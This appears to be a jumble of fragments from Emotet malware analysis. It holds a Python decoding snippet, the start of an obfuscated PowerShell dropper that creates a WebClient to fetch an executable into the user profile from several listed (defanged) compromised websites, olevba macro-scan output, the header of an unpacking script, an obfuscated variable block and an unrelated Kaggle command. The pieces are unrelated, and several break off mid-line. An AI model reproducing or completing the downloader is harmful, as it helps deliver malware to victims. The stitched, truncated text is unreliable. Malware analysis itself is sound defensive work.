import binascii
from itertools import cycle

SERVER_RESPONSE_FIE = "server_response.txt"
XOR_KEY = b"ZKkz8PH0"

# Read the saved server response from disk
with open(SERVER_RESPONSE_FIE) as serverfd:
    resp_str = serverfd.read()
# Reverse the response string
resp_str = resp_str[::-1]

$jrFhA0='Wf1rHz'
$uUMMLI = '284'
$iBtj49N='ThMqW8s0'
$FwcAJs6=$env:userprofile+'\'+$uUMMLI+'.exe'
$S9GzRstM='EFCwnlGz'
$u8UAr3=&('new-object') NeT.wEBClIEnt
$pLjBqINE='http[:]//blockchainjoblist[.]com/wp-admin/014080/
@ https[:]//womenempowermentpakistan[.]com/wp-admin/paba5q52/
@ https[:]//atnimanvilla[.]com/wp-content/073735/
@ https[:]//yeuquynhnhai[.]com/upload/41830/

#!/usr/bin/env python3
# Name:
# unpack_emotet.py
# Description:
# This script accompanies my blog at
# https://mirshadx.wordpress.com/2020/11/22/analyzing-an-emotet-dropper-and-writing-a-python-script-to-statically-unpack-payload/
# and can be used to statically unpack given sample in the blog
# Author:
# https://twitter.com/mirshadx
# https://www.linkedin.com/in/irshad-muhammad-3020b0a5/

olevba 0.55.1 on Python 2.7.18 - http://decalage.info/python/oletools
===============================================================================
FILE: emotet.doc
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------

$ olevba.exe charge_07.20.doc
olevba 0.55.1 on Python 2.7.18 - http://decalage.info/python/oletools
===============================================================================
FILE: charge_07.20.doc
Type: OpenXML
Error: [Errno 2] No such file or directory: 'word/vbaProject.bin'.
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

29$A3560804E16 = A2B00000233($OS[1]), $A4B60A04F1C = A2B00000233($OS[2]), $A3A60C03143 = A2B00000233($OS[3]), $A3360E01054 = A2B00000233($OS[4]), $A1070005C36 = A2B00000233($OS[5]), $A2C70204F5F = A2B00000233($OS[6]), $A5A7040361D = A2B00000233($OS[7]), $A5870605460 = A2B00000233($OS[8]), $A567080112D = A2B00000233($OS[9]), $A5670D0410E = A2B00000233($OS[10]), $A5E80205900 = A2B00000233($OS[11]), $A4580403500 = A2B00000233($OS[12]), $A5D80603E25 = A2B00000233($OS[13]), $A3580801732 = A2B00000233($OS[14]), $A5480A0022D = A2B00000233($OS[15]), $A2F80C00D40 = A2B00000233($OS[16]), $A2580E03701 = A2B00000233($OS[17]), $A639000454B = A2B00000233($OS[18]), $A0E90203930 = A2B00000233($OS[19]), $A5990405F41 = A2B00000233($OS[20]), $A0C9060335F = A2B00000233($OS[21]), $A079080083C = A2B00000233($OS[22]), $A3690A02A2A = A2B00000233($OS[23]), $A5890C04F61 = A2B00000233($OS[24]), $A1590E03C19 = A2B00000233($OS[25]), $A54A0002952 = A2B00000233($OS[26]), $A07A0201025 = A2B00000233($OS[27]), $A2DA0400532 = A2B00000233($OS[2 |
kg download -u <username> -p <password> -c planet-understanding-the-amazon-from-space